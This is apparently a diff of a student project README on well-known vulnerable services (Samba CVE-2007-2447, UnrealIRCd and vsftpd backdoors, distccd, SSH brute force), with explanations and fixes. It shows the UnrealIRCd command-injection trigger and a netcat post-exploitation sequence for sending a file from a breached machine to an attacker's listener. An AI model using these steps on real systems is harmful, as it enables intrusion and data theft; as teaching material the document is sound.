Patrick122333/4240project/README.md

 ### SAMBA CVE-2007-2447
 - Version: 3.0.20 < 3.0.25rc3
 - Desc: Samba is a software that is a re-implmentation of the SMB networking protocol.
 This software provides file and print services for all clients as long as they are using the SMB protocol.
-- Exploit: If Samba is configured to use the non-default username map script, anyone can send arbitrary commands in disguise as a username to the server.
+- Exploit: If Samba is configured to use the username map script, anyone can send arbitrary commands in disguise as a username to the server.
+The data sent to the targeted machine is not sanitized.
 The command will then be run without needing authorization.
-- Fix:
+- Fix: To fix this, the user can update to a new version.
+If they are still on the older version, the user can navigate to /etc/samba/smb.conf on the vulnerable machine.
+The user can then either comment out or remove the line "username map script = /etc/samba/scripts/mapusers.sh".

-### UnrealRCD CVE-2010-2075
+### UnrealIRCd CVE-2010-2075
 - Version: 3.2.8.1
-- Desc: UnrealRCD is a daemon for Internet Realy Chat usage in order to provide chat services.
+- Desc: UnrealIRCD is a daemon for Internet Realy Chat usage in order to provide chat services.
-- Exploit: UnrealRCD contains an exploit where it will execute any command send to the service if it begins with the string 'AB'.
-Ex: AB; [command to run]
+- Exploit: UnrealIRCD contains an exploit where it will execute any command with the priviledges of the user that is running the service if it begins with the string 'AB'.
+Ex: AB; [command to run].
-- Fix:
+- Exploit Cont: This exploit was introduced because someone had replaced all UnrealIRCD file download options on their mirror sites with a version that had a trojan in it.
+- Fix: The only way to fix this exploit is to redownload a legitamate version of Unreal.
+This is because the backdoor is located in the "core" of the service (according to the developers).

 ### VSFTP CVE-2011-2523
 - Version: 2.3.4
 - Desc: VSFTP is an FTP server for linux.
-- Exploit: The exploit occurs when a user tries to login with a username that ends with ':)'.
+- Exploit: There was a backdoor built into the VSFTP service that allows someone to gain root access to a targeted machine if they login with a username that has ':)'.
 This opens a shell on port 6200, allowing the attacker unauthenticated access.
-- Fix:
+- Fix: The individual could update the the service or if they are still running on the version with the backdoor, they could set up an iptable to drop unused ports.
+(Which should be done anyways).
+Ex: iptables -A INPUT -p tcp --dport 6200 -j DROP and iptables -A INPUT -p udp --dport 6200 -j DROP

 ### SSH (BRUTE FORCE EXAMPLE)
 - Version: Any.
 - Desc: The SSH service allows for communication between a computer network.
-- Exploit: This is less of an exploit and more of poor system security.
-Users can prevent brute force attacks by incorporating a proper firewall to filter out ip addresses, using public key authentication, using strong and unqiue passwords, etc....
+- Exploit: This is less of an exploit and more of poor system security and poor cyber security practices.
+- Fix: Use strong passwords that can not be easily guessed.
+A more secure option would be to set up ssh key pairs.

+### DistCC CVE-2004-2687
+- Version:
+- Desc: Distccd is a service that allows for a faster compilation time of C programs by distributing the compilation tasks across multiple different machines where it is able to find resources to do so.
+- Exploit: DistCCD has a vulnerability that allows an attacker to execute arbitray commands on the targeted system.
+This is because the distccd daemon improperly handles commands send to it as a compilation request.
+- Fix: Other than updating distccd to a version where the exploit has been patched, the user can configure distccd to only accept connection from trusted hosts through the use of a custom firewall configuration.

+###

-## Post-Exploitation Example:
+## Post-Exploitation Examples:
 - After gaining access to the remote system and starting a shell session, the user can manually use netcat to search for a specified file.
 Here is an example:
   - Open a terminal on the local host and run "nc -lnvp [portnum] > [file for info to be stored]"
   - On the remote machine (the breached machine) run the command " [IP of local machine] [portnum] < [file path to be retrieved]